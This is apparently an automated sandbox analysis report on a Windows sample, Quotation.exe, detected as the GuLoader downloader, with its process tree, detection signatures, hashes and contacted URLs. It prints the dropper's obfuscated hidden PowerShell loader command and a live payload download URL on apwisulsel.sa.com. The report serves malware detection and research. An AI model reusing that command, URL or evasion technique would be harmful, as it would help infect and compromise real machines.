Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Quotation.exe

Overview

General Information

Sample name:Quotation.exe
Analysis ID:1417386
MD5:833003bdb504ba4d779a2aff899859e0
SHA1:8acb52c29e7edc16e99a1dcf96f2a9abc6045771
SHA256:076191d0ad7379e339a2824bb74c2c1906477a32be3f92318c436500cdcf0af9
Infos:

Detection

GuLoader
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Initial sample is a PE file and has a suspicious name
Obfuscated command line found
Powershell drops PE file
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Potential Dosfuscation Activity
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64_ra
  • Quotation.exe (PID: 2136 cmdline: "C:\Users\user\Desktop\Quotation.exe" MD5: 833003BDB504BA4D779A2AFF899859E0)
    • powershell.exe (PID: 4360 cmdline: "powershell" -windowstyle hidden "$Betalingsdages=Get-Content 'C:\Users\user\AppData\Local\Temp\springvandenes\Intransparency\Bowleres.Hed';$Taplet=$Betalingsdages.SubString(58707,3);.$Taplet($Betalingsdages)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 6196 cmdline: "C:\Windows\system32\cmd.exe" /c "set /A 1^^0" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • wab.exe (PID: 7040 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • svchost.exe (PID: 6276 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000E.00000002.2383373007.0000000005D2E000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000002.00000002.2098766772.000000000D38C000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

      Sigma Signatures

      System Summary

      barindex
      Sigma detected: Suspicious Script Execution From Temp Folder
      Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "powershell" -windowstyle hidden "$Betalingsdages=Get-Content 'C:\Users\user\AppData\Local\Temp\springvandenes\Intransparency\Bowleres.Hed';$Taplet=$Betalingsdages.SubString(58707,3);.$Taplet($Betalingsdages)", CommandLine: "powershell" -windowstyle hidden "$Betalingsdages=Get-Content 'C:\Users\user\AppData\Local\Temp\springvandenes\Intransparency\Bowleres.Hed';$Taplet=$Betalingsdages.SubString(58707,3);.$Taplet($Betalingsdages)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Quotation.exe", ParentImage: C:\Users\user\Desktop\Quotation.exe, ParentProcessId: 2136, ParentProcessName: Quotation.exe, ProcessCommandLine: "powershell" -windowstyle hidden "$Betalingsdages=Get-Content 'C:\Users\user\AppData\Local\Temp\springvandenes\Intransparency\Bowleres.Hed';$Taplet=$Betalingsdages.SubString(58707,3);.$Taplet($Betalingsdages)", ProcessId: 4360, ProcessName: powershell.exe
      Sigma detected: Potential Dosfuscation Activity
      Source: Process startedAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\system32\cmd.exe" /c "set /A 1^^0", CommandLine: "C:\Windows\system32\cmd.exe" /c "set /A 1^^0", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "powershell" -windowstyle hidden "$Betalingsdages=Get-Content 'C:\Users\user\AppData\Local\Temp\springvandenes\Intransparency\Bowleres.Hed';$Taplet=$Betalingsdages.SubString(58707,3);.$Taplet($Betalingsdages)", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4360, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\cmd.exe" /c "set /A 1^^0", ProcessId: 6196, ProcessName: cmd.exe
      Sigma detected: Non Interactive PowerShell Process Spawned
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -windowstyle hidden "$Betalingsdages=Get-Content 'C:\Users\user\AppData\Local\Temp\springvandenes\Intransparency\Bowleres.Hed';$Taplet=$Betalingsdages.SubString(58707,3);.$Taplet($Betalingsdages)", CommandLine: "powershell" -windowstyle hidden "$Betalingsdages=Get-Content 'C:\Users\user\AppData\Local\Temp\springvandenes\Intransparency\Bowleres.Hed';$Taplet=$Betalingsdages.SubString(58707,3);.$Taplet($Betalingsdages)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Quotation.exe", ParentImage: C:\Users\user\Desktop\Quotation.exe, ParentProcessId: 2136, ParentProcessName: Quotation.exe, ProcessCommandLine: "powershell" -windowstyle hidden "$Betalingsdages=Get-Content 'C:\Users\user\AppData\Local\Temp\springvandenes\Intransparency\Bowleres.Hed';$Taplet=$Betalingsdages.SubString(58707,3);.$Taplet($Betalingsdages)", ProcessId: 4360, ProcessName: powershell.exe
      Sigma detected: Windows Processes Suspicious Parent Directory
      Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 656, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6276, ProcessName: svchost.exe

      Snort Signatures

      No Snort rule has matched

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Antivirus detection for URL or domain
      Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
      Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
      Multi AV Scanner detection for dropped file
      Source: C:\Users\user\AppData\Local\Temp\springvandenes\Udstiller48\Kulmuler\Generationsskifternes\Specialudvalg\Quotation.exeReversingLabs: Detection: 58%
      Source: C:\Users\user\AppData\Local\Temp\springvandenes\Udstiller48\Kulmuler\Generationsskifternes\Specialudvalg\Quotation.exeVirustotal: Detection: 15%Perma Link
      Multi AV Scanner detection for submitted file
      Source: Quotation.exeReversingLabs: Detection: 58%
      Source: Quotation.exeVirustotal: Detection: 15%Perma Link
      Source: Quotation.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: Quotation.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: ystem.Core.pdb source: powershell.exe, 00000002.00000002.2094251518.0000000008BCE000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdbl source: powershell.exe, 00000002.00000002.2090205765.00000000076A3000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000002.00000002.2083067727.0000000003231000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Core.pdb source: powershell.exe, 00000002.00000002.2083067727.000000000320F000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Core.pdbk source: powershell.exe, 00000002.00000002.2083067727.000000000320F000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000002.00000002.2083067727.0000000003231000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: ws\System.Core.pdbE source: powershell.exe, 00000002.00000002.2094251518.0000000008BCE000.00000004.00000020.00020000.00000000.sdmp
      Source: C:\Users\user\Desktop\Quotation.exeFile opened: C:\Users\userJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer ShortcutsJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeFile opened: C:\Users\user\AppDataJump to behavior
      Source: Joe Sandbox ViewIP Address: 104.128.228.214 104.128.228.214
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownDNS traffic detected: queries for: apwisulsel.sa.com
      Source: powershell.exe, 00000002.00000002.2094251518.0000000008B8C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microz;r
      Source: svchost.exe, 00000005.00000002.2392550483.0000022135C00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
      Source: qmgr.db.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
      Source: qmgr.db.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
      Source: qmgr.db.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
      Source: qmgr.db.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
      Source: qmgr.db.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
      Source: qmgr.db.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
      Source: edb.log.5.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
      Source: Quotation.exe, Quotation.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: powershell.exe, 00000002.00000002.2088496728.00000000061F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: powershell.exe, 00000002.00000002.2084166984.00000000052E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: Quotation.exe, Quotation.exe.2.drString found in binary or memory: http://s.symcb.com/universal-root.crl0
      Source: Quotation.exe, Quotation.exe.2.drString found in binary or memory: http://s.symcd.com06
      Source: powershell.exe, 00000002.00000002.2084166984.0000000005191000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: Quotation.exe, Quotation.exe.2.drString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
      Source: Quotation.exe, Quotation.exe.2.drString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
      Source: Quotation.exe, Quotation.exe.2.drString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
      Source: powershell.exe, 00000002.00000002.2084166984.00000000052E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: powershell.exe, 00000002.00000002.2094251518.0000000008B30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.coiJa
      Source: powershell.exe, 00000002.00000002.2084166984.0000000005191000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6
      Source: wab.exe, 0000000E.00000003.1781879858.0000000006EAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apwisulsel.sa.com/
      Source: wab.exe, 0000000E.00000002.2392316689.0000000006EBA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000E.00000003.1781879858.0000000006EAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apwisulsel.sa.com/$
      Source: wab.exe, 0000000E.00000002.2392316689.0000000006EBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apwisulsel.sa.com/(
      Source: wab.exe, 0000000E.00000002.2392316689.0000000006ECD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000E.00000003.1781879858.0000000006EAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apwisulsel.sa.com/C
      Source: wab.exe, 0000000E.00000003.1781879858.0000000006EAD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000E.00000002.2392316689.0000000006ED3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apwisulsel.sa.com/EnPWajJ251.bin
      Source: wab.exe, 0000000E.00000002.2393553213.0000000006EE9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000E.00000003.2112888645.0000000006EE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apwisulsel.sa.com/EnPWajJ251.binW
      Source: wab.exe, 0000000E.00000002.2392316689.0000000006EBA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000E.00000003.1781879858.0000000006EAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apwisulsel.sa.com/EnPWajJ251.binb
      Source: wab.exe, 0000000E.00000002.2393553213.0000000006EE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apwisulsel.sa.com/EnPWajJ251.bincf&
      Source: wab.exe, 0000000E.00000002.2392316689.0000000006EBA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000E.00000003.1781879858.0000000006EAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apwisulsel.sa.com/EnPWajJ251.bing
      Source: wab.exe, 0000000E.00000002.2392316689.0000000006EC4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000E.00000003.1781879858.0000000006EAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apwisulsel.sa.com/EnPWajJ251.binoE
      Source: wab.exe, 0000000E.00000002.2392316689.0000000006EBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apwisulsel.sa.com/lsel.sa.com/apwisulsel.sa.com5
      Source: wab.exe, 0000000E.00000002.2392316689.0000000006EBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apwisulsel.sa.com/r4
      Source: powershell.exe, 00000002.00000002.2088496728.00000000061F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000002.00000002.2088496728.00000000061F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000002.00000002.2088496728.00000000061F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: Quotation.exe, Quotation.exe.2.drString found in binary or memory: https://d.symcb.com/cps0%
      Source: Quotation.exe, Quotation.exe.2.drString found in binary or memory: https://d.symcb.com/rpa0
      Source: Quotation.exe, Quotation.exe.2.drString found in binary or memory: https://d.symcb.com/rpa0.
      Source: edb.log.5.drString found in binary or memory: https://g.live.com/odclientsettings/Prod-C:
      Source: svchost.exe, 00000005.00000003.1202909008.0000022135BB2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2-C:
      Source: powershell.exe, 00000002.00000002.2084166984.00000000052E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000002.00000002.2088496728.00000000061F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
      Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712

      System Summary

      barindex
      Initial sample is a PE file and has a suspicious name
      Source: initial sampleStatic PE information: Filename: Quotation.exe
      Powershell drops PE file
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\springvandenes\Udstiller48\Kulmuler\Generationsskifternes\Specialudvalg\Quotation.exeJump to dropped file
      Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0835A6782_2_0835A678
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0835BFA02_2_0835BFA0
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_083521F82_2_083521F8
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_083522202_2_08352220
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0835BF902_2_0835BF90
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_083A29B82_2_083A29B8
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_083A45EA2_2_083A45EA
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_083A55E12_2_083A55E1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_083AE3902_2_083AE390
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_083A5A802_2_083A5A80
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_083A7C502_2_083A7C50
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_083A8D282_2_083A8D28
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_083A83302_2_083A8330
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_083AE3902_2_083AE390
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_083AE3802_2_083AE380
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_083AD5282_2_083AD528
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_083F7BF02_2_083F7BF0
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_083F7BE22_2_083F7BE2
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_083F26982_2_083F2698
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_083F26872_2_083F2687
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_089AAF692_2_089AAF69
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_089AAF692_2_089AAF69
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_089BE1082_2_089BE108
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_089B83802_2_089B8380
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_089BA3A82_2_089BA3A8
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_089B9BA82_2_089B9BA8
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_089BCDE02_2_089BCDE0
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_089BB5402_2_089BB540
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_089BAD402_2_089BAD40
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_089B3EB02_2_089B3EB0
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_089B96402_2_089B9640
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_089B07C82_2_089B07C8
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_089EC9A82_2_089EC9A8
      Source: Quotation.exeStatic PE information: invalid certificate
      Source: Quotation.exe, 00000000.00000000.1124757872.0000000000489000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameslammen endpoints.exeB vs Quotation.exe
      Source: Quotation.exeBinary or memory string: OriginalFilenameslammen endpoints.exeB vs Quotation.exe
      Source: Quotation.exe.2.drBinary or memory string: OriginalFilenameslammen endpoints.exeB vs Quotation.exe
      Source: C:\Users\user\Desktop\Quotation.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeSection loaded: dwmapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeSection loaded: oleacc.dllJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeSection loaded: riched20.dllJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeSection loaded: usp10.dllJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeSection loaded: msls31.dllJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
